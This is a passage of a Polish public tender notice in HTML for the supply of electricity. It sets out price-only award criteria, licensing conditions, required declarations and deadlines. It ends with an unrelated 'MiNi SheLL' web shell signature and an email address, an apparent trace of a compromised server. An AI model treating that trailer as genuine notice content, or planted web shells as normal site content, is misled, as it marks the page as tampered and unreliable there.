zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zmówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu;<br/>2. spełniają warunku udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie określił warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający określa warunek w powyższym zakresie:<br/>a) Wykonawca spełni warunek, jeżeli wykaże, że posiada aktualne uprawnienia (koncesję) do wykonywania działalności w<br/>zakresie obrotu energią elektryczną wymagane przepisami ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne (t. j. Dz.<br/>U. z 2022 r., poz. 1385 ze zm.) wydaną przez Prezesa Urzędu Regulacji Energetyki.<br/>Odnośnie do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten zostanie spełniony, jeżeli co<br/>najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej i zrealizuje świadczenie, do którego realizacji te uprawnienia są<br/>wymagane.<br/>b) Wykonawca spełni warunek, jeżeli wykaże, że posiada aktualne uprawnienia (koncesję) do wykonywania działalności w<br/>zakresie dystrybucji energią elektryczną wymagane przepisami ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne (t. j.<br/>Dz. U. z 2022 r., poz. 1385 ze zm.) wydaną przez Prezesa Urzędu Regulacji Energetyki – dotyczy Wykonawców będących<br/>właścicielami sieci dystrybucyjnej lub<br/>posiada aktualną umowę z Operatorem Systemu Dystrybucyjnego (OSD) na świadczenie usług dystrybucji energii<br/>elektrycznej na obszarze, na którym znajduje się miejsce dostarczenia energii elektrycznej – dotyczy Wykonawców<br/>niebędących właścicielami sieci dystrybucji.<br/>Odnośnie do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten zostanie spełniony, jeżeli co<br/>najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej i zrealizuje świadczenie, do którego realizacji te uprawnienia są<br/>wymagane<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie określił warunku w tym zakresie.<br/>4) zdolności technicznej lub zawodowej: Zamawiający nie określił warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">w<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) Aktualną koncesję na prowadzenie działalności gospodarczej w zakresie obrotu energią elektryczną zgodnie z art. 32 ustawy z<br/>dnia 10 kwietnia 1997 r. Prawo energetyczne (t. j. Dz. U. z 2022 r. poz. 1385 ze zm.) wydaną przez Prezesa Urzędu Regulacji<br/>Energetyki;<br/>b) Aktualną koncesję na prowadzenie działalności gospodarczej w zakresie dystrybucji energią elektryczną zgodnie z art. 32 ustawy<br/>z dnia 10 kwietnia 1997 r. Prawo energetyczne (t. j. Dz. U. z 2022 r. poz. 1385 ze zm.) wydaną przez Prezesa Urzędu Regulacji<br/>Energetyki w przypadku Wykonawców będących właścicielami sieci dystrybucji lub<br/>oświadczenie Wykonawcy o posiadaniu aktualnej umowy z Operatorem Systemu Dystrybucyjnego (OSD) na świadczenie usług<br/>dystrybucji energii elektrycznej na obszarze, na którym znajdują się miejsca dostarczenia energii elektrycznej- w przypadku<br/>Wykonawców nie będących właścicielami sieci dystrybucyjnej –wzór załącznik nr 11 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>a) informacje z Krajowego Rejestru Karnego w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy Pzp oraz art. 108 ust. 1 pkt 4 ustawy Pzp,<br/>dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego - sporządzonej nie wcześniej niż 6<br/>miesięcy przed jej złożeniem;<br/>b) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. Dz. U. z 2023 r., poz. 1689 z późn. zm.), z<br/>innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej - według wzoru stanowiącego - załącznik nr 9 do SWZ.<br/>c) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/> art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie, publiczne tytułem środka<br/>zapobiegawczego,<br/>art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>- według wzoru stanowiącego załącznik nr 10 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały przewidziane we wzorze umowy załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-21 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com